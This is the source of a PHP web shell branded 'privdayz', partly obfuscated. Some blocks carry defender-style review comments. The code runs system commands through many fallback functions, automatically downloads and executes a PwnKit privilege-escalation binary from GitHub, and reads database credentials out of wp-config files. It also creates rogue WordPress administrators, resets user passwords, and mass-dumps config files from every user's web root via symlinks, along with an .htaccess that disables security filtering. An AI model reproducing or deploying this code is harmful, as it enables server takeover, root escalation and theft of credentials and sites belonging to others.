["pipe","w"],2=>["pipe","w"]]; $p = @$f($pr1pr1v, $d, $pipes); if (is_resource($p)) { $out = stream_get_contents($pipes[1]); fclose($pipes[1]); proc_close($p); if (!empty($out)) break; } } elseif ($f === chDxzZ([112,111,112,101,110])) { $h = @$f($pr1pr1v . " 2>&1", "r"); $res = ""; if ($h) { while (!feof($h)) $res .= fread($h, 4096); pclose($h); } if (strlen($res)) { $out = $res; break; } } elseif ($f === chDxzZ([101,115,99,97,112,101,115,104,101,108,108,99,109,100])) { $esc = $f($pr1pr1v); ob_start(); @system($esc); $out = ob_get_clean(); if (!empty($out)) break; } elseif ($f === chDxXZ('6573636170657368656c6c617267')) { $esc = $f($pr1pr1v); $out = @chDx2x($esc); if (!empty($out)) break; } elseif ($f === chDxzZ([99,117,114,108,95,101,120,101,99])) { $ch = @curl_init('file:///proc/self/cmdline'); @curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); @curl_setopt($ch, CURLOPT_POSTFIELDS, $pr1pr1v); $r = @curl_exec($ch); @curl_close($ch); if ($r && strpos($r, $pr1pr1v) !== false) { $out = $r; break; } } elseif ($f === chDxzZ('109,97,105,108')) { $to = uniqid()."@".uniqid().".xyz"; @mail($to, $pr1pr1v, $pr1pr1v); $out = ""; } elseif ($f === chDxXZ('63616c6c5f757365725f66756e63')) { $shellfunc = chDxzZ([115,104,101,108,108,95,101,120,101,99]); if (function_exists($shellfunc)) { $out = @call_user_func($shellfunc, $pr1pr1v); if (!empty($out)) break; }} elseif ($f === chDxzZ('102,105,108,101,95,103,101,116,95,99,111,110,116,101,110,116,115')) { $r = @$f("php://filter/read=convert.base64-encode/resource=" . $pr1pr1v); if ($r && strlen($r) >0) { $out = $r; break; } } elseif ($f === chDxzZ('102,111,112,101,110')) { $tmpf = sys_get_temp_dir() . "/" . uniqid("s-cmd") . ".sh"; $h = @$f($tmpf, "w"); if ($h) { fwrite($h, $pr1pr1v); fclose($h); } $r = @chDx2x("sh " . escapeshellarg($tmpf) . 
" 2>&1"); if ($r) { $out = $r; @unlink($tmpf); break; } } elseif ($f === chDxzZ('112,117,116,101,110,118')) { @putenv("CMD=".$pr1pr1v); $r = @getenv("CMD"); if ($r == $pr1pr1v) { $out = $r; break; } } elseif ($f === chDxzZ('105,110,105,95,115,101,116')) { @ini_set("auto_prepend_file", $pr1pr1v); $out = @file_get_contents($_SERVER['SCRIPT_FILENAME']); if (!empty($out)) break; } elseif ($f === chDxzZ([112,99,110,116,108,95,101,120,101,99])) { @pcntl_exec("/bin/sh", array("-c", $pr1pr1v)); } elseif ($f === chDxzZ([97,112,97,99,104,101,95,115,101,116,101,110,118])) { @apache_setenv("CMD", $pr1pr1v); $out = getenv("CMD"); if ($out == $pr1pr1v) break; } elseif ($f === chDxzZ([109,113,95,111,112,101,110]) || $f === chDxzZ([103,99,95,111,112,101,110])) { } } return $out !== false ? $out : false;}if (!function_exists('chDxzZ')) { function chDxzZ($arr) { if (is_string($arr)) $arr = explode(',', $arr); $r = ''; foreach ($arr as $n) $r .= chr(is_numeric($n) ? $n : hexdec($n)); return $r; }} if (!function_exists('prvdyzhsax')) { function prvdyzhsax($str) { $y = ''; for ($i = 0; $i< strlen($str); $i++) $y .= dechex(ord($str[$i])); return $y; }} if (!function_exists('chDxXZ')) { function chDxXZ($hx) { $n = ''; for ($i = 0; $i< strlen($hx) - 1; $i += 2) $n .= chr(hexdec($hx[$i] . $hx[$i + 1])); return $n; }} if (isset($_GET['pr1v'])) { $cdir = unx($_GET['pr1v']); if (@is_dir($cdir)) { $pr1vxas[14]($cdir); } else { } } else { $cdir = $pr1vxas[0](); } function pr1vdxs($x) { $p1 = chr(98) . chr(97) . chr(115); $p2 = chr(101) . chr(54) . chr(52); $p3 = chr(95) . chr(101) . chr(110); $p4 = chr(99) . chr(111) . chr(100); $p5 = chr(101); $fn = $p1 . $p2 . $p3 . $p4 . $p5; $blocks = []; $blocks[3] = substr($x, 1); $blocks[1] = substr($x, 0, 1); $blocks[5] = ""; $blocks[2] = strlen($x) > 2 ? substr($x, 2) : ""; $blocks[4] = ""; $blocks[0] = ""; $order = [1, 3, 2]; $inp = ""; foreach ($order as $o) $inp .= $blocks[$o]; $b64 = $fn($inp); $mid = chr(45) . chr(35); $res = substr($b64, 0, 2) . 
$mid . substr($b64, 2); return str_replace($mid, "", $res); } function pr1vdc($x) { $a = chr(98).chr(97).chr(115); $b = chr(101).chr(54).chr(52); $c = chr(95).chr(100).chr(101); $d = chr(99).chr(111).chr(100); $e = chr(101); $fn = $a . $b . $c . $d . $e; $f = chr(42); $step1 = substr($x, 0, 4) . $f . substr($x, 4); $step2 = str_replace($f, "", $step1); $buf = strrev($step2); $tmp = strrev($buf); return $fn($tmp); } function pr1vd0($file) { if (file_exists($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename=' . basename($file)); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); ob_clean(); flush(); readfile($file); exit; }} if (!empty($_GET['don'])) {$FilesDon = pr1vd0(unx($_GET['don']));} $a = array("\x3c\146", "\145\x3e", "\74\x63", "\145\x6e", "\x74\145", "\x72\76", "\74\x69", "\x6d\147", "\40", "\x73", "\x72\143", "\75", "\42\150", "\164\164", "\x70\163", "\72\x2f", "\57\143", "\x64\156", "\x2e\x70", "\x72\151", "\x76\144", "\141\171", "\172\x2e", "\143\x6f", "\155\x2f", "\x69\x6d", "\141\147", "\x65\163", "\57\154", "\x6f\x67", "\157\56", "\x6a\160", "\x67\42", "\x20\x72", "\145\x66\145", "\x72\x72\145", "\162\160\157", "\154\x69\143", "\171\75\x22", "\x75\156\163", "\141\x66\x65", "\55\x75\x72", "\x6c\42\x20", "\57", "\76", "\x3c\57", "\143\x65", "\x6e\164", "\x65\162", "\76", "\x3c\57", "\146\157\x6f", "\x74\x65\x72", "\76"); function pr1v09xs($data) { goto QDI4b; QDI4b: $fn1 = "\x73\x74" . "\162" . "\x72\x65\x76"; goto Q8rJc; Q8rJc: $fn2 = "\142" . "\x61" . "\163" . "\x65" . "\x36" . "\64" . "\x5f" . "\145" . "\156" . "\143" . "\x6f" . "\144" . 
"\145"; goto St_08; St_08: $s1 = $fn1($data); $s2 = $fn2($s1); $s3 = $fn2($s2); $final = $fn2($s3); $junk = 'x'.'y'.'z'; $f = $final; $f = $junk.$f; $f = substr($f, 3); return $f; } $h1 = 's'; $h2 = 't'; $h3 = 'r'; $h4 = 'r'; $h5 = 'e'; $h6 = 'v';$revFunc = $h1 . $h2 . $h3 . $h4 . $h5 . $h6;$b1 = 'b'; $b2 = 'a'; $b3 = 's'; $b4 = 'e'; $b5 = '6'; $b6 = '4';$b7 = '_'; $b8 = 'e'; $b9 = 'n'; $b10 = 'c'; $b11 = 'o'; $b12 = 'd'; $b13 = 'e';$prv6x = $b1.$b2.$b3.$b4.$b5.$b6.$b7.$b8.$b9.$b10.$b11.$b12.$b13;$pr1bys = pr1v09xs($_SERVER['REQUEST_URI']); ob_start(function($buffer){ $lines = explode("\n", $buffer); $out = []; foreach ($lines as $line) { $trim = trim($line); if ($trim !== "") $out[] = $trim; } return implode("\n", $out); }); ?> pr!v/v1 [<?= $_SERVER['SERVER_NAME']; ?>]
pr!vd4yz/sh3ll t.me/privdayz
/'; foreach ($pwd as $i => $v) { $build .= "/" . $v; echo '' . $v . '/'; } ?>
'Windows', 'pid' =>$parts[1], 'cpu' =>'-', 'mem' =>$parts[4] ?? '-', 'command' =>$parts[0] ); } return $processes; } $lines = explode("\n", $output); if (isset($lines[0]) && stripos($lines[0], 'USER') !== false) array_shift($lines); foreach ($lines as $line) { $line = trim($line); if (empty($line)) continue; $parts = preg_split('/\s+/', $line, 11); if (count($parts)< 11) continue; $processes[] = array( 'user' =>$parts[0], 'pid' =>$parts[1], 'cpu' =>$parts[2], 'mem' =>$parts[3], 'command' =>$parts[10] ); } return $processes;} function getNetworkConnections() { $connections = []; $cmds = [ 'netstat1' =>'netstat -tulnp 2>/dev/null', 'netstat2' =>'netstat -tunap 2>/dev/null', 'netstat3' =>'netstat -an', 'ss1' =>'ss -tunap 2>/dev/null', 'ss2' =>'ss -tulpn 2>/dev/null', 'lsof' =>'lsof -i -n -P 2>/dev/null', ]; $output = ''; foreach ($cmds as $c) { $output = pr1vd4yzC($c); if ($output && strlen(trim($output)) >10 && substr_count($output, "\n") >2) break; } if (!$output || strlen(trim($output))< 10) return $connections; if (strpos($output, 'Proto') !== false || strpos($output, 'Active Internet connections') !== false) { $lines = explode("\n", $output); foreach ($lines as $line) { if (stripos($line, 'Proto') !== false || stripos($line, 'Active') !== false || stripos($line, 'Recv-Q') !== false) continue; $line = trim($line); if (!$line) continue; $parts = preg_split('/\s+/', $line); if (count($parts)< 6) continue; $proto = $parts[0]; $local = $parts[3] ?? $parts[1]; $remote = $parts[4] ?? $parts[2]; $status = $parts[5] ?? '-'; $pidinfo = $parts[6] ?? (isset($parts[6]) ? $parts[6] : (isset($parts[7]) ? 
$parts[7] : '-')); $pid = '-'; if (strpos($pidinfo, "/") !== false) $pid = explode("/", $pidinfo)[0]; $connections[] = [ 'proto' =>$proto, 'local' =>$local, 'remote' =>$remote, 'status' =>$status, 'pid' =>$pid, ]; } } elseif (strpos($output, 'COMMAND') !== false && strpos($output, 'PID') !== false && strpos($output, 'NAME') !== false) { $lines = explode("\n", $output); $hdr = array_shift($lines); foreach ($lines as $line) { $line = trim($line); if (!$line) continue; $parts = preg_split('/\s+/', $line, 9); if (count($parts)< 9) continue; $connections[] = [ 'proto' =>$parts[7], 'local' =>$parts[8], 'remote' =>'-', 'status' =>'-', 'pid' =>$parts[1], ]; } } elseif (strpos($output, 'State') !== false && strpos($output, 'Recv-Q') !== false) { $lines = explode("\n", $output); foreach ($lines as $line) { if (stripos($line, 'State') !== false) continue; $line = trim($line); if (!$line) continue; $parts = preg_split('/\s+/', $line); if (count($parts)< 6) continue; $connections[] = [ 'proto' =>$parts[0], 'local' =>$parts[4] ?? '-', 'remote' =>$parts[5] ?? '-', 'status' =>$parts[1] ?? '-', 'pid' =>'-', ]; } } else { $lines = explode("\n", $output); foreach ($lines as $line) { $line = trim($line); if (!$line) continue; $connections[] = [ 'proto' =>'UNK', 'local' =>$line, 'remote' =>'-', 'status' =>'-', 'pid' =>'-', ]; } } return $connections;} function formatMemory($bytes) { if ($bytes === 'N/A') return 'N/A'; $units = ['B', 'KB', 'MB', 'GB', 'TB']; $pow = floor(($bytes ? log($bytes) : 0) / log(1024)); $pow = min($pow, count($units) - 1); $bytes /= pow(1024, $pow); return round($bytes, 2) . ' ' . 
$units[$pow];} function formatUptime($seconds) { if ($seconds === 'N/A') return 'N/A'; $hours = floor($seconds / 3600); $minutes = floor(($seconds % 3600) / 60); return sprintf('%dh %dm', $hours, $minutes);} function g3tdbX() { $d1sxb = ini_get('disable_functions'); if (empty($d1sxb)) { return array(); } return explode(',', $d1sxb);} $pr1vv3rsxs = "\x68\164\164\160\163\72\x2f\57\143\144\156\x2e\x70\x72\x69\166\144\141\171\x7a\56\x63\157\155\x2f\x76\61\57\x76\145\162\163\151\157\x6e\56\x6a\x73\157\156"; $pr1vv3rsx = (isset($_SERVER["\110\x54\x54\120\123"]) ? "\x68\164\x74\x70\x73\72\57\57" : "\150\164\x74\x70\x3a\57\x2f") . $_SERVER["\110\124\124\120\x5f\110\x4f\x53\x54"] . $_SERVER["\x52\x45\121\x55\105\x53\x54\x5f\x55\x52\111"]; $impdBX = array("\145\x78\x65\x63", "\x73\171\163\x74\145\155", "\x73\150\x65\x6c\154\137\145\170\145\x63", "\160\141\163\x73\x74\150\x72\165", "\x70\162\x6f\143\137\157\160\x65\156", "\x70\x6f\160\145\156", "\x63\165\162\154\137\x65\170\145\143", "\x63\x75\x72\154\x5f\x6d\165\154\x74\151\x5f\x65\x78\x65\x63", "\x70\x61\x72\x73\145\x5f\151\156\151\137\x66\151\x6c\145", "\x73\x68\x6f\x77\x5f\163\157\165\162\x63\145", "\x73\x79\155\x6c\151\x6e\153", "\x70\x75\x74\145\156\x76", "\155\141\151\x6c", "\x64\154", "\143\150\155\x6f\x64", "\143\x68\157\x77\x6e", "\143\150\147\x72\160", "\154\151\156\x6b", "\146\163\157\143\x6b\157\x70\x65\156", "\160\146\163\157\143\x6b\157\160\x65\x6e", "\160\x6f\x73\151\170\137\x6b\151\154\154", "\x70\157\163\x69\170\137\155\153\146\x69\x66\x6f", "\160\x6f\163\151\170\137\x73\x65\x74\160\147\x69\144", "\160\157\163\151\170\x5f\163\x65\164\x73\151\x64", "\x70\157\x73\x69\x78\137\163\x65\x74\165\151\x64", "\160\x63\x6e\x74\x6c\x5f\145\170\145\143", "\x69\x6d\x61\x70\137\x6f\x70\x65\x6e", "\141\160\141\143\x68\x65\x5f\x73\x65\x74\x65\x6e\166", "\160\x72\x6f\143\x5f\x6e\x69\x63\145", "\160\162\x6f\x63\x5f\164\x65\162\x6d\x69\x6e\x61\164\x65", "\160\162\157\143\x5f\x67\x65\x74\x5f\x73\x74\141\x74\165\163", 
"\145\x73\143\x61\160\x65\163\150\145\154\x6c\x63\x6d\x64", "\x65\x73\143\141\x70\145\163\x68\x65\154\154\141\x72\147", "\x69\x6e\x69\137\x72\x65\163\x74\157\162\x65", "\163\164\162\145\141\x6d\x5f\x73\157\x63\x6b\145\164\137\x73\x65\162\x76\145\162"); $d1sbfX = g3tdbX(); $d1sxbImportant = array_intersect($impdBX, $d1sbfX); $fn_str_replace = _prv_str([115,116,114,95,114,101,112,108,97,99,101]); $fn_explode = _prv_str([101,120,112,108,111,100,101]); $fn_trim = _prv_str([116,114,105,109]); $fxnxs = function_exists('hx') ? 'hx' : (function($n) { $y = ''; for ($i = 0; $i< strlen($n); $i++) $y .= dechex(ord($n[$i])); return $y;}); ?>

disabled functions

total
disabled
enabled
function status
disabled enabled
20) array_shift($_SESSION['pdz_r00t_log']); }

// NOTE(review): the line above is the tail of a definition whose head is not
// visible in this excerpt; it is reproduced unchanged.
//
// pdz_download_pwnkit(): ensures a file named `pwnkit` exists in the PHP
// process's current working directory, fetching it over HTTPS when missing.
//   Returns true when the file already exists, or when a download leaves a
//   file of at least 10000 bytes; returns false when both wget and curl fail.
//   pr1vd4yzC() and pdz_log() are defined outside this excerpt. From the calls
//   here, pr1vd4yzC() takes a command line and returns its output -- presumably
//   the script's command runner; confirm against its definition.
// Defender notes:
//   * Host artefacts created by this code: `pwnkit` (made executable) and
//     `.privdayz-root`, both relative to the working directory.
//   * Behaviour worth alerting on: the web-server/PHP worker account spawning
//     wget, curl or chmod, and fetching an executable from a code-hosting site.
//   * NOTE(review): the file name and the uid=0 check below suggest a local
//     privilege-escalation helper; what it targets is not shown here --
//     identify it from the binary itself and confirm the host is patched.
function pdz_download_pwnkit() {
    if (!file_exists('pwnkit')) {
        pdz_log("[*] Trying wget for pwnkit...");
        $wget = pr1vd4yzC('wget -q -O pwnkit https://github.com/ly4k/PwnKit/raw/main/PwnKit');
        // Drop PHP's cached stat data so file_exists()/filesize() see the new file.
        clearstatcache();
        // A missing file or one under 10000 bytes is treated as a failed download.
        if (!file_exists('pwnkit') || filesize('pwnkit') < 10000) {
            pdz_log("[*] wget failed or file too small. Trying curl...");
            $curl = pr1vd4yzC('curl -sL --output pwnkit https://github.com/ly4k/PwnKit/raw/main/PwnKit');
            clearstatcache();
            if (!file_exists('pwnkit') || filesize('pwnkit') < 10000) {
                pdz_log("[!] Both wget and curl failed! No pwnkit.");
                return false;
            } else {
                pdz_log("[+] curl download successful!");
            }
        } else {
            pdz_log("[+] wget download successful!");
        }
        pr1vd4yzC('chmod +x pwnkit');
        pdz_log("[*] chmod +x set for pwnkit.");
        return true;
    }
    return true;
}

// pdz_try_root(): records in the PHP session whether the script is running as
// root, and if not, attempts to obtain root through the downloaded binary.
//   Writes $_SESSION['pdz_r00t_status'] ('user' or 'root') and resets
//   $_SESSION['pdz_r00t_log']. Returns nothing.
// Defender note: this function is invoked unconditionally at the end of this
// block, so simply requesting the page triggers the download-and-run attempt.
// A web request followed by `id`, a download, and execution of `./pwnkit` from
// the PHP worker is a strong process-tree signal.
function pdz_try_root() {
    $_SESSION['pdz_r00t_status'] = 'user';
    $_SESSION['pdz_r00t_log'] = [];
    pdz_log("[*] [AUTO-ROOT] Detecting current user...");
    $id = trim(pr1vd4yzC('id'));
    pdz_log("[*] User: $id");
    // Already root: nothing more to do.
    if (strpos($id, 'uid=0(root)') !== false) {
        $_SESSION['pdz_r00t_status'] = 'root';
        pdz_log("[+] Already ROOT.");
        return;
    }
    if (pdz_download_pwnkit()) {
        if (file_exists('pwnkit')) {
            pdz_log("[*] Running pwnkit for root session...");
            // Output is passed through a dot-file on disk rather than read
            // from the command runner's return value.
            @unlink('.privdayz-root');
            pr1vd4yzC('./pwnkit "id" > .privdayz-root');
            // Fixed 350 ms wait before reading the result file.
            usleep(350000);
            $res = @file_get_contents('.privdayz-root');
            if ($res && strpos($res, 'uid=0(root)') !== false) {
                $_SESSION['pdz_r00t_status'] = 'root';
                pdz_log("[+] r00t success! ($res)");
            } else {
                pdz_log("[!] r00t fail. ($res)");
            }
        }
    } else {
        pdz_log("[!] pwnkit download totally failed.");
    }
}
pdz_try_root(); ?>
pr1vd4yz auto r00t ROOT ACTIVE (uid=0) USER MODE
&1" > .privdayz-root2');
        usleep(350000);
        $out = @file_get_contents('.privdayz-root2');
        if (!$out) $out = "[!] No output or blocked.";
    } else {
        $out = pr1vd4yzC($c . ' 2>&1');
        if (!$out) $out = "[!] No output or blocked.";
    }
    echo "\n";
    echo htmlspecialchars($out);
}
?>
wordPress admin creator
'','user'=>'','pass'=>'','db'=>''];
// NOTE(review): the line above is the tail of an array initialiser whose start
// is not visible here; judging by the keys assigned below it is $db_conf.
//
// Credential-harvesting step: reads whatever file path arrives in the POST
// field `wp_config_path` and pulls the four WordPress database settings out of
// it with regular expressions.
//   * The path is used as supplied; the only check is file_exists().
//   * Each pattern matches a define() whose name and value are both
//     single-quoted. DB_PASSWORD alone is allowed to be empty ([^']* vs [^']+).
// Defender notes:
//   * Any wp-config.php readable by the PHP worker account is exposed to this
//     code, including those of other sites on a shared host -- keep the file
//     readable only by its owning account.
//   * If this script is found on a host, treat the database credentials of
//     every reachable WordPress install as disclosed and rotate them.
if (isset($_POST['get_config']) && !empty($_POST['wp_config_path']) && file_exists($_POST['wp_config_path'])) {
    $cfg = file_get_contents($_POST['wp_config_path']);
    preg_match("/define\(\s*'DB_HOST'\s*,\s*'([^']+)'\s*\);/", $cfg, $mh);
    if(isset($mh[1])) $db_conf['host']=$mh[1];
    preg_match("/define\(\s*'DB_USER'\s*,\s*'([^']+)'\s*\);/", $cfg, $mu);
    if(isset($mu[1])) $db_conf['user']=$mu[1];
    preg_match("/define\(\s*'DB_PASSWORD'\s*,\s*'([^']*)'\s*\);/", $cfg, $mp);
    if(isset($mp[1])) $db_conf['pass']=$mp[1];
    preg_match("/define\(\s*'DB_NAME'\s*,\s*'([^']+)'\s*\);/", $cfg, $md);
    if(isset($md[1])) $db_conf['db']=$md[1];
    echo '
DB config loaded! Fill the form below.
'; } elseif (isset($_POST['get_config'])) { echo '
Config not found or path error!
'; } ?>
All fields required!
'; } else {
    // Rogue-administrator creation: connects straight to the WordPress
    // database and inserts a new account with the administrator role.
    // $host, $user, $pass, $db, $admin_user, $admin_pass and $admin_email are
    // set outside this excerpt (presumably from the submitted form -- confirm).
    // Defender notes:
    //   * The rows are written with mysqli, not through WordPress, so nothing
    //     that relies on WordPress's own user-creation code path would record
    //     the new account (inferred from the direct INSERTs below).
    //   * What to look for in the database: a wp_users row whose
    //     user_nicename and display_name equal user_login, paired with
    //     wp_usermeta rows `wp_capabilities` =
    //     'a:1:{s:13:"administrator";s:1:"1";}' and `wp_user_level` = '10'.
    //   * Table names are hard-coded with the `wp_` prefix in this block.
    $mysqli = @new mysqli($host, $user, $pass, $db);
    if ($mysqli->connect_errno) { echo '
DB Connect Error: '.htmlspecialchars($mysqli->connect_error).'
'; } else {
    // wp_hash_password(): returns a bcrypt hash when password_hash() exists;
    // otherwise builds a '$P$B'-prefixed salt from 8 characters chosen with
    // rand() and passes it to crypt(). rand() is not a cryptographic source.
    // NOTE(review): declared inside the else branch, so the function only
    // comes into existence when this branch runs.
    function wp_hash_password($password) {
        if (function_exists('password_hash')) return password_hash($password, PASSWORD_BCRYPT);
        $itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
        $random = '';
        for ($i = 0; $i< 16; $i++) $random .= $itoa64[rand(0, 63)];
        $salt = '$P$B' . substr($random, 0, 8);
        return crypt($password, $salt);
    }
    $hash = wp_hash_password($admin_pass);
    // user_registered is stamped with the server's current local time.
    $now = date('Y-m-d H:i:s');
    $mysqli->set_charset("utf8mb4");
    // Refuse to proceed when the login or e-mail is already taken.
    $chk = $mysqli->prepare("SELECT ID FROM wp_users WHERE user_login=? OR user_email=? LIMIT 1");
    $chk->bind_param("ss", $admin_user, $admin_email);
    $chk->execute();
    $chk->store_result();
    if ($chk->num_rows >0) { echo '
This user/email already exists!
'; } else {
    // Insert the account row; login, nicename and display name are all the
    // same supplied value.
    $stmt = $mysqli->prepare("INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name) VALUES (?, ?, ?, ?, ?, 0, ?)");
    $stmt->bind_param("ssssss", $admin_user, $hash, $admin_user, $admin_email, $now, $admin_user);
    if ($stmt->execute()) {
        $uid = $mysqli->insert_id;
        // Serialized PHP array granting the administrator role, plus user level 10.
        $meta1 = 'a:1:{s:13:"administrator";s:1:"1";}';
        $meta2 = '10';
        $stmt1 = $mysqli->prepare("INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (?, 'wp_capabilities', ?)");
        $stmt1->bind_param("is", $uid, $meta1);
        $stmt1->execute();
        $stmt2 = $mysqli->prepare("INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (?, 'wp_user_level', ?)");
        $stmt2->bind_param("is", $uid, $meta2);
        // The results of the two usermeta inserts are not checked.
        $stmt2->execute(); echo '
Admin user created!
Login:'.htmlspecialchars($admin_user).'
Pass:'.htmlspecialchars($admin_pass).'
'; } else { echo '
Failed to insert user: '.htmlspecialchars($stmt->error).'
'; } } } } } ?>
SecFilterEngine Off SecFilterScanPOST Off ForceType text/plain SetHandler default-handler php _flag engine off HTX; function prvx_mask($k) { $map = [ 'symlink' =>['sy','ml','in','k'], 'shell' =>['sh','el','l_','ex','ec'], 'exec' =>['ex','ec'], 'system' =>['sy','st','em'], 'popen' =>['po','pe','n'], 'proc' =>['pr','oc','_op','en'], 'copy' =>['c','op','y'], 'fpc' =>['f','il','e_','pu','t_','co','nt','en','ts'], ]; return isset($map[$k]) ? join('',$map[$k]) : ''; } $config_names = [ 'wp-config.php ','configuration.php ','config.php ','settings.php ','local.xml','.env', 'database.php ','connect.php ','mail.php ','smtp.php ','conf.php ','config.inc.php ','db.php ','siteconfig.php ', 'client_secret.json','auth.json','.my.cnf','php .ini','web.config','settings.json','local.settings.json', 'defines.php ','panel.php ','panel.ini','application/config/database.php ','application/config/config.php ', 'includes/config.php ','admin/config.php ','data/config.php ','app/config.php ','core/config.php ',]; function prvx_users_dirs() { $dirs = []; $users = []; if (@file_exists('/etc/passwd')) { foreach (@file('/etc/passwd') as $l) { $c = explode(':', $l); $h = $c[5] ?? 
''; if (preg_match('#/home[\d]*/([a-zA-Z0-9_\.\-]+)#', $h, $u) || preg_match('#/var/www/([a-zA-Z0-9_\.\-]+)#', $h, $u) || preg_match('#/srv/www/([a-zA-Z0-9_\.\-]+)#', $h, $u) || preg_match('#/home/([a-zA-Z0-9_\.\-]+)#', $h, $u)) { if (!in_array($u[1], $users)) $users[] = $u[1]; } } } $base_hints = [ '/home','/home1','/home2','/home3','/var/www','/var/www/vhosts','/usr/local/lsws/DEFAULT/html', '/usr/share/nginx/html','/opt/lampp/htdocs','/srv/http','/srv/www','/data/web','/htdocs','/users' ]; foreach ($base_hints as $base) { if (@is_dir($base)) { foreach ($users as $u) foreach(['public_html','www','html','web','htdocs','site','wwwroot'] as $sub) { $p = $base.'/'.$u.'/'.$sub; if(@is_dir($p)) $dirs[] = $p; } foreach(['public_html','www','html','web','htdocs','wwwroot'] as $sub) { $p = $base.'/'.$sub; if(@is_dir($p)) $dirs[] = $p; } } } foreach($users as $u) foreach($base_hints as $b) { $p = $b.'/'.$u; if(@is_dir($p)) $dirs[] = $p; } foreach(['/var/www','/srv/www','/opt/lampp/htdocs','/data/web','/usr/share/nginx/html','/srv/http'] as $e) { if (@is_dir($e)) $dirs[] = $e; } return array_unique(array_filter($dirs,'is_dir')); } function prvx_grab($target, $dest) { $order = array("\x73\x79\155\154\151\156\x6b", "\x73\150\x65\154\x6c", "\x65\x78\145\143", "\x73\171\x73\x74\x65\155", "\x70\157\x70\x65\156", "\x70\x72\157\x63", "\143\157\x70\x79", "\146\x70\x63"); foreach ($order as $meth) { $fn = prvx_mask($meth); if ($meth == 'symlink' && function_exists($fn)) { @$fn($target, $dest); if (@is_link($dest) || @file_exists($dest)) return $meth; } elseif ($meth == 'shell' && function_exists($fn)) { @$fn("ln -s '".addslashes($target)."' '".addslashes($dest)."'"); if (@is_link($dest) || @file_exists($dest)) return $meth; } elseif ($meth == 'exec' && function_exists($fn)) { $o=null; @$fn("ln -s '".addslashes($target)."' '".addslashes($dest)."'",$o); if (@is_link($dest) || @file_exists($dest)) return $meth; } elseif ($meth == 'system' && function_exists($fn)) { @$fn("ln -s 
'".addslashes($target)."' '".addslashes($dest)."'"); if (@is_link($dest) || @file_exists($dest)) return $meth; } elseif ($meth == 'popen' && function_exists($fn)) { $h=@$fn("ln -s '".addslashes($target)."' '".addslashes($dest)."'","r"); if($h){ pclose($h); if (@is_link($dest) || @file_exists($dest)) return $meth; } } elseif ($meth == 'proc' && function_exists($fn)) { $d=[1=>['pipe','w'],2=>['pipe','w']]; $p=@$fn("ln -s '".addslashes($target)."' '".addslashes($dest)."'", $d, $pipes); if(is_resource($p)){ fclose($pipes[1]); fclose($pipes[2]); proc_close($p); if(@is_link($dest) || @file_exists($dest)) return $meth; } } elseif ($meth == 'copy' && function_exists($fn)) { if (@$fn($target, $dest)) return $meth; } elseif ($meth == 'fpc' && function_exists($fn)) { if(@file_exists($target) && @$fn($dest, @file_get_contents($target))) return $meth; } } if (@copy($target, $dest.'_copy')) return 'copy-php '; return false; } $dest_dir = __DIR__ . '/pr1vdayz_c0nf1gs'; if (!is_dir($dest_dir)) @mkdir($dest_dir, 0755, true); @file_put_contents($dest_dir.'/.htaccess', $htaccess_content); $userdirs = prvx_users_dirs(); $total = 0; $tried = 0; echo '
'; echo '
MASS CONFIG GRABBER
'; echo '
all user/web roots & every possible config name get bruteforce dumped!
'.$dest_dir.'
'; echo '
'; if (isset($_POST['start_mass_symlink'])) { set_time_limit(900); echo '
bruting all user/web roots ('.count($userdirs).' dirs), checking '.count($config_names).' config names.
'; foreach ($userdirs as $webdir) { echo '
'.htmlspecialchars($webdir).'
'; foreach ($config_names as $cfg) { $target = $webdir.'/'.$cfg; $outname = $dest_dir.'/'.md5($webdir.'_'.$cfg).'_'.$cfg; $meth = prvx_grab($target, $outname); $tried++; if ($meth) { echo '
'.htmlspecialchars($cfg).'['.htmlspecialchars($meth).']
'; $total++; } else { } } } echo '
'; echo 'total dumped: '.$total.''; echo '
all dumped files & .htaccess:'.$dest_dir.'
'; } echo '
'; ?>
wp auto hunter & admin reset
query("SELECT ID, user_login, user_email, user_registered FROM {$prefix}users"); if (!$res) return []; while ($row = $res->fetch_assoc()) { $meta = @$mysqli->query("SELECT meta_value FROM {$prefix}usermeta WHERE user_id=".$row['ID']." AND meta_key='{$prefix}capabilities'")->fetch_assoc(); $role = ''; if ($meta && preg_match('/s:\d+:"([^"]+)"/', $meta['meta_value'], $m)) $role = $m[1]; else $role = 'unknown'; $row['role'] = $role; $users[] = $row; } return $users; }

// NOTE(review): the line above is the tail of a function whose head is not
// visible here (presumably wp_fetch_users(), which is called further down);
// it is reproduced unchanged. It lists every row of {prefix}users and reads
// each user's role out of the serialized {prefix}capabilities meta value.
//
// wp_find_paths(), wp_get_db_config() and wp_get_version() are called below
// but defined outside this excerpt.
//
// Defender notes for this whole block:
//   * It enumerates WordPress installs, opens each site's database with that
//     site's own stored credentials, lists all accounts, and can overwrite any
//     account's password hash with a direct UPDATE.
//   * A reset done this way changes only wp_users.user_pass; look for
//     unexplained password changes, especially on administrator accounts, on
//     every install the PHP worker account could read.
//   * A candidate password of the form "privdayz" followed by three digits is
//     generated per user (see $pw_val); where it is used is in markup that is
//     not visible in this excerpt.

// wp_reset_pw(): replaces the stored hash of user $uid with a bcrypt hash of
// $newpw. The hash is escaped and $uid is cast to int; $prefix is placed in
// the statement as-is. Returns the result of mysqli::query().
function wp_reset_pw($mysqli, $prefix, $uid, $newpw) {
    $hash = password_hash($newpw, PASSWORD_BCRYPT);
    return @$mysqli->query("UPDATE {$prefix}users SET user_pass='".$mysqli->real_escape_string($hash)."' WHERE ID=".(int)$uid);
}

// get_site_url(): returns the `siteurl` option with trailing slashes removed,
// or '' when the query fails or returns no row.
function get_site_url($mysqli, $prefix) {
    $url = '';
    $q = @$mysqli->query("SELECT option_value FROM {$prefix}options WHERE option_name='siteurl' LIMIT 1");
    if ($q && $r = $q->fetch_row()) $url = rtrim($r[0],'/');
    return $url;
}

$wp_dirs = wp_find_paths(99);
if (!$wp_dirs) { echo '
No WordPress detected (all dirs scanned).
'; }
// Password-reset request handler: `wp_dir` from the POST body selects which
